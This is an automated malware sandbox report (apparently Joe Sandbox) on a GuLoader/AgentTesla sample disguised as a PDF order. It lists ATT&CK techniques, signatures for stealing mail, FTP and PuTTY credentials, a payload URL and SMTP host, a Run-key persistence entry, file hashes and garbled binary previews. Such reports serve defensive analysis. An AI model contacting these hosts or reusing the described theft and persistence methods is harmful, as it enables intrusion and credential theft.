            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials in Registry
            116
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth1
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)1
            Process Injection
            2
            Obfuscated Files or Information
            Security Account Manager321
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration1
            Non-Standard Port
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)11
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer2
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets241
            Virtualization/Sandbox Evasion
            SSHKeyloggingData Transfer Size Limits22
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common241
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Access Token Manipulation
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            Process Injection
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            Hidden Files and Directories
            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680367 Sample: Ordene 501527,pdf.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 92 36 merian.com.ar 2->36 38 mail.merian.com.ar 2->38 56 Yara detected GuLoader 2->56 58 Yara detected AgentTesla 2->58 60 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 2->60 8 Ordene 501527,pdf.exe 23 2->8         started        11 flex.exe 2 2->11         started        13 flex.exe 1 2->13         started        signatures3 process4 file5 30 C:\...\Microsoft.Office.Tools.Common.v9.0.dll, PE32 8->30 dropped 32 C:\Users\user\...\FanControlWrapper.dll, PE32+ 8->32 dropped 34 C:\Users\user\AppData\Local\...\System.dll, PE32 8->34 dropped 15 CasPol.exe 2 21 8->15         started        20 CasPol.exe 8->20         started        22 conhost.exe 11->22         started        24 conhost.exe 13->24         started        process6 dnsIp7 40 merian.com.ar 69.61.116.42, 49796, 49797, 587 GLOBALCOMPASSUS United States 15->40 42 141.98.6.239, 49793, 80 CMCSUS Germany 15->42 28 C:\Users\user\AppData\Roaming\flex\flex.exe, PE32 15->28 dropped 44 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->44 46 Tries to steal Mail credentials (via file / registry access) 15->46 48 Tries to harvest and steal ftp login credentials 15->48 54 3 other signatures 15->54 26 conhost.exe 15->26         started        50 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->50 52 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 20->52 file8 signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Ordene 501527,pdf.exe7%ReversingLabsWin32.Malware.Tedy
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsd84B6.tmp\System.dll3%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsd84B6.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dll0%ReversingLabs
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dll0%ReversingLabs
            C:\Users\user\AppData\Roaming\flex\flex.exe0%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\flex\flex.exe0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            merian.com.ar0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            https://sectigo.com0%VirustotalBrowse
            https://sectigo.com0%Avira URL Cloudsafe
            https://sectigo.com/CPS00%VirustotalBrowse
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            https://api.ipify.org%appdata0%Avira URL Cloudsafe
            https://rwUCPncwlnlg0H1LG.nett-0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
            http://merian.com.ar0%Avira URL Cloudsafe
            https://api.ipify.org%t-0%Avira URL Cloudsafe
            http://FvewWS.com0%Avira URL Cloudsafe
            http://mail.merian.com.ar0%Avira URL Cloudsafe
            http://141.98.6.239/zeaveZtePRlRbWLesj75.dwp0%Avira URL Cloudsafe
            http://141.98.6.239/zeaveZtePRlRbWLesj75.dwplh0%Avira URL Cloudsafe
            https://rwUCPncwlnlg0H1LG.net0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            merian.com.ar
            69.61.116.42
            truefalseunknown
            mail.merian.com.ar
            unknown
            unknownfalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://141.98.6.239/zeaveZtePRlRbWLesj75.dwpfalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://127.0.0.1:HTTP/1.1CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://sectigo.comCasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://sectigo.com/CPS0CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://api.ipify.org%appdataCasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://rwUCPncwlnlg0H1LG.nett-CasPol.exe, 00000009.00000002.44518958056.000000001DA75000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://merian.com.arCasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.ipify.org%t-CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              http://FvewWS.comCasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000009.00000002.44518397705.000000001DA13000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://nsis.sf.net/NSIS_ErrorErrorOrdene 501527,pdf.exefalse
                  high
                  http://mail.merian.com.arCasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://141.98.6.239/zeaveZtePRlRbWLesj75.dwplhCasPol.exe, 00000009.00000002.44498847642.00000000014D6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://rwUCPncwlnlg0H1LG.netCasPol.exe, 00000009.00000002.44518958056.000000001DA75000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.40043700714.000000001C831000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519545264.000000001DAD1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  69.61.116.42
                  merian.com.arUnited States
                  22653GLOBALCOMPASSUSfalse
                  141.98.6.239
                  unknownGermany
                  33657CMCSUSfalse
                  Joe Sandbox Version:35.0.0 Citrine
                  Analysis ID:680367
                  Start date and time: 08/08/202213:27:292022-08-08 13:27:29 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 13m 45s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Ordene 501527,pdf.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                  Run name:Suspected Instruction Hammering
                  Number of analysed new started processes analysed:27
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal92.troj.spyw.evad.winEXE@8/12@1/2
                  EGA Information:
                  • Successful, ratio: 50%
                  HDC Information:
                  • Successful, ratio: 100% (good quality ratio 100%)
                  • Quality average: 91.6%
                  • Quality standard deviation: 15.8%
                  HCA Information:
                  • Successful, ratio: 95%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Adjust boot time
                  • Enable AMSI
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • TCP Packets have been reduced to 100
                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.93.58.141
                  • Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, spclient.wg.spotify.com, client.wns.windows.com, wdcpalt.microsoft.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                  • Execution Graph export aborted for target flex.exe, PID 5196 because it is empty
                  • Execution Graph export aborted for target flex.exe, PID 7436 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  TimeTypeDescription
                  13:30:16API Interceptor2613x Sleep call for process: CasPol.exe modified
                  13:30:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run flex C:\Users\user\AppData\Roaming\flex\flex.exe
                  13:30:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run flex C:\Users\user\AppData\Roaming\flex\flex.exe
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Users\user\AppData\Roaming\flex\flex.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):42
                  Entropy (8bit):4.0050635535766075
                  Encrypted:false
                  SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                  MD5:84CFDB4B995B1DBF543B26B86C863ADC
                  SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                  SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                  SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                  Malicious:false
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                  Process:C:\Users\user\Desktop\Ordene 501527,pdf.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):11776
                  Entropy (8bit):5.659384359264642
                  Encrypted:false
                  SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                  MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                  SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                  SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                  SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                  Malicious:false
                  Antivirus:
                  • Antivirus: Metadefender, Detection: 3%, Browse
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\Ordene 501527,pdf.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):53480
                  Entropy (8bit):6.013119476725682
                  Encrypted:false
                  SSDEEP:768:Sd5iVw6ve4HsIrMTW5q6Aq2g1AEpwhaPvWFzg4KClyQ2c94PkhEeaA2X9qKh:s4wmnMT6Jp2g1a4s+7
                  MD5:8D512C6FFE33E6B77981497ED40D9092
                  SHA1:A31DE10B01C626D528FEF987CE5D7DB68D228849
                  SHA-256:25673566002F8EEF81872E2913DA0E44D0B7480EF824EDD1C12D725A122CAE1C
                  SHA-512:479DDADE0F58CFDEB43EEACD38D0CE8A361275A2BD4257CDF4FA3DD5A5FEEF231E6E41D0F2BF3F17AF8DF38B0DB72114677C42B69865F90F81329041CDFBB4A5
                  Malicious:false
                  Antivirus:
                  • Antivirus: Metadefender, Detection: 0%, Browse
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..-w..~w..~w..~~..~q..~%..t..~...s..~i..~u..~%..d..~%.....~%..u..~...u..~w..~Y..~...r..~...v..~..x~v..~w..~v..~...v..~Richw..~................PE..d...h6;a.........." .....2...........>..............................................$(....`......................................... ...........................................@....S..p............................T...............P..............XS..H............text............0.................. ..`.nep....p....@.......4.............. ..`.rdata..$m...P...n...6..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..@...........................@..B................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\Ordene 501527,pdf.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):356352
                  Entropy (8bit):5.597789776248351
                  Encrypted:false
                  SSDEEP:6144:gAENg6Ta1Hjxcv/IUIuoeT/xK6ur6EaPC:gdgbFK/IU7T/xK6ur6EaP
                  MD5:E047210B4CE2BBF0F6A9819031C5874A
                  SHA1:FBE964CABCD15468EFF6848ACE2F49E194C2B1B4
                  SHA-256:F0C45C94B8B1B38718FD373E9E98BF76A5552D8405DE3A98A6CADBE9610F7E74
                  SHA-512:57754F490FAD208076EA717470E431493396556E5DC4BE53ED2ACFBBC00857B9F6A5AEDA66FFE82F4E4CF405ABEF16E72F77535932E9D166CC4F3DE262AC09D8
                  Malicious:false
                  Antivirus:
                  • Antivirus: Metadefender, Detection: 0%, Browse
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..H...........!.........P.......-... ...@....UA. ....................................@..................................-..W....@..`7...........................,............................................... ............... ..H............text........ ...................... ..`.rsrc...`7...@...@... ..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\Ordene 501527,pdf.exe
                  File Type:SVG Scalable Vector Graphics image
                  Category:dropped
                  Size (bytes):1327
                  Entropy (8bit):4.272364610533777
                  Encrypted:false
                  SSDEEP:24:2dPnnxu3tlKpRe+9abXi2QP+60wWgP7IC233P+60cXW7GTNWgPN:cfnHFabXij+zgP7ICK+r7GTUgPN
                  MD5:36C1AE9391F50D4AD3A1E61CA30CBFCB
                  SHA1:DF3D58AB8DBFD1CE9F0456C4F8C84440A1005507
                  SHA-256:9FDDABAAF63AE19BA00A965BBDAACAC3703AB2F055661040A4ACFF2882D0087B
                  SHA-512:180D77E3FA447CED1276C2E2070E110667530C864C71961E97E80B51C214C7BEBF604104F6A0DF87A4779E6E3AD08C5A574278F70C6D36C083FE727B1DD66476
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 14 1 l -5.203125 4.972656 l 1.5625 1.527344 l 5.640625 -5.5 v -1 z m -6.804688 6.5 l -2.976562 2.84375 l 1.6875 1.5 l 2.890625 -2.816406 z m 0 0"/>. <path d="m 4.21875 5.65625 l 9.78125 9.34375 h 2 v -1 l -10.09375 -9.84375 z m 0 0"/>. <path d="m 5.972656 1.019531 c -1.359375 -1.359375 -3.59375 -1.359375 -4.953125 0 c -1.359375 1.359375 -1.359375 3.59375 0 4.953125 s 3.59375 1.363282 4.953125 0 c 1.359375 -1.359375 1.359375 -3.59375 0 -4.953125 z m -1.414062 1.414063 c 0.597656 0.59375 0.597656 1.53125 0 2.125 c -0.59375 0.597656 -1.527344 0.597656 -2.125 0 c -0.59375 -0.59375 -0.59375 -1.527344 0 -2.125 c 0.597656 -0.59375 1.53125 -0.59375 2.125 0 z m 0 0"/>. <path d="m 5.972656 10.019531 c -1.359375 -1.359375 -3.59375 -1.359375 -4.953125 0 c -1.359375 1.359375 -1.359375 3.597657 0 4.957031 c 1.359
                  Process:C:\Users\user\Desktop\Ordene 501527,pdf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):76679
                  Entropy (8bit):6.814432315698124
                  Encrypted:false
                  SSDEEP:1536:XJV/wgXTw40tzGcM8E7nhHaxpqeGhJrfBxdKTi:XJWgXTyvE7nqMhJvL
                  MD5:FFDF86E18706923E73DE9A5D67A8C9EB
                  SHA1:F01102765BEEB1330F29E2427C9559EDBEEA8D4E
                  SHA-256:63D2CBFFAB97859707640C94C9810AF953093F01FF0E7FDB2DBFF3827935EDC0
                  SHA-512:1D3E7DD9A687580682CB827CAB4C3D50F9EEC145411EEE24261DB0F89B8A087B5B6DE57B33E2D6B6E807D9AA79005050E5E09A4D58FC60F4E48F31BD32C7BF72
                  Malicious:false
                  Preview:8..f9.8.f9..r..._.b.f9.....X.......?.u/8..nf._....u ..,..8..,9.....u...f.^.f.^.9...;..........X......f._...............$.........f9.......5h...f.^..b..9.5..q...X.f9.f._.8...#m.f.^........n........r..E5..........f._.f._.f.^.8.-.....^.f._......f9.P.............wZ.............8..@......1.......=....f9.f._.=.....4.! .W..f9....9...D9...b.........9.u..u......W..o..X..$...f9..........W!#.zg.9.8.Z.a.%.}+:.!_........^.@.hW0.>LQ{.N.."%eA.U5..v./.....G.n.j`K..7.((....rL\.g..5.......w.a.QY.*...puv.0......~.)....l..(.((.((.((.((.((.((.((.((.((.((.((.((.((..Q.9.8.Z.a.%.}+:.!_........^.@.hW0.>LQ{.N.."%eA.U5..v./.....G.n.j`K..7.((....rL\.g..5.......w.a.QY.*...puv.0......~.)....l...((.((.((.((.((.((.((.((.((.((.((.((.((.((.((.((.((.....((.((.((.((.((.((.((.((.((.((.((.((.((.((.((..x.Q....((.((.((.((.((.((.((.((.((.((.((.((.((.((.(....s{(.((.((.((.((.((.((.((.((.((.((.((.((.((.((....... ..P...3....5z......m.......((.((.((.((.((.((.((.((.((.((.((.((.((.((.((.((.((.(...(.((.
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3036000
                  Category:dropped
                  Size (bytes):98304
                  Entropy (8bit):2.9216957692876595
                  Encrypted:false
                  SSDEEP:384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
                  MD5:1A706D20E96086886B5D00D9698E09DF
                  SHA1:DACF81D90647457585345BEDD6DE222E83FDE01F
                  SHA-256:759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
                  SHA-512:CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
                  Malicious:false
                  Preview:SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000
                  Category:modified
                  Size (bytes):98304
                  Entropy (8bit):0.08231524779339361
                  Encrypted:false
                  SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                  MD5:886A5F9308577FDF19279AA582D0024D
                  SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                  SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                  SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):108664
                  Entropy (8bit):5.8959760602012965
                  Encrypted:false
                  SSDEEP:1536:QSF7vA1hRqHNxxMjlI3ZC+0CtOss6mdcQ6A4vhZ91RKGpQJN:nA1hYPMUs6mdclA4vhNRKG4N
                  MD5:914F728C04D3EDDD5FBA59420E74E56B
                  SHA1:8C68CA3F013C490161C0156EF359AF03594AE5E2
                  SHA-256:7D3BDB5B7EE9685C7C18C0C3272DA2A593F6C5C326F1EA67F22AAE27C57BA1E6
                  SHA-512:D7E49B361544BA22A0C66CF097E9D84DB4F3759FBCC20386251CAAC6DA80C591861C1468CB7A102EEE1A1F86C974086EBC61DE4027F9CD22AD06D63550400D6D
                  Malicious:true
                  Antivirus:
                  • Antivirus: Metadefender, Detection: 0%, Browse
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..X...........v... ........@.. ..............................O.....`.................................\v..O.......$............f..xB..........$u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc...$............Z..............@..@.reloc...............d..............@..B.................v......H.......(...................xE..$t......................................2~P....o....*.r...p(....*VrK..p(....s.....P...*..0.._.......~....:O....>.....%.rm..p...A...s......su....%.r...p...A...s....rm..p.su....%.r...p...B...s......su....%.r...p...B...s....r...p.su....%.r...p...C...s......su....%.r...p...C...s....r...p.su....%.r...p...D...s......su....%.r...p...D...s....r...p.su....%.r...p...E...s......su....%..r...p...E...s....r...p.su....%..r...p...F...s......su....%..r...p...F
                  Process:C:\Users\user\AppData\Roaming\flex\flex.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):486
                  Entropy (8bit):5.043661544202442
                  Encrypted:false
                  SSDEEP:12:z30d30C4BFNY8fNFquci7S1pE+DPOCN6+QOH5JyY:z3I3+DO4UE+Tz5JB
                  MD5:323764DD20845C0EE00598E8EE35467C
                  SHA1:7A3DC131CCF4B3A41893F83C553193267A7F654F
                  SHA-256:7DEBA11FDF38735A63038192BF033BAE7F49E72E598F0AEFD3FC626477A31FEF
                  SHA-512:BF353BCB64D65024C7E627788D32087C15EC5F8780AACF61D57BC22923F2283D0A5ED389CA644270013835EF26269F2E5EEE4ED610AC88254855DE80D67F3700
                  Malicious:false
                  Preview:Microsoft .NET Framework CasPol 4.8.4084.0..for Microsoft .NET Framework version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....WARNING: The .NET Framework does not apply CAS policy by default. Any settings shown or modified by CasPol will only ..affect applications that opt into using CAS policy. ....Please see http://go.microsoft.com/fwlink/?LinkId=131738 for more information. ......ERROR: Not enough arguments....For usage information, use 'caspol -?'..
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):6.549201429075207
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Ordene 501527,pdf.exe
                  File size:596608
                  MD5:5162b6782f86f1f24e8610544d159ae9
                  SHA1:0d1ead84c74ee462976928783c1f733aa859bc94
                  SHA256:6730e52c8075c7e044c2bbaf9f7ad8c0f7f8d03fb23adbd2331adc8b591caec7
                  SHA512:ccbea38e4c47edf9172e47f8ea884bae222365500d17bc5d95bef911d64feb6857ac7c2d99bd9b6a0a6112a042ea0e74cd958b656883912827451f21c5113f83
                  SSDEEP:6144:B6bAcJOv+qlAcxp8XNbu0lTCzYQhb3VG+rmAYJDB5aRELlQBjokpKE+c0AzugkGd:a+NniSb3VtrHSaklQBjo0KE+72jCMii
                  TLSH:96C4AE4179B86ED3F57E03716CA7869212A8EC141672E71B3192FE17B4B23532B0F29D
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....uY.................d....:....
                  Icon Hash:71c884a498dc7890
                  Entrypoint:0x403350
                  Entrypoint Section:.text
                  Digitally signed:true
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x59759518 [Mon Jul 24 06:35:04 2017 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:b34f154ec913d2d2c435cbd644e91687
                  Signature Valid:false
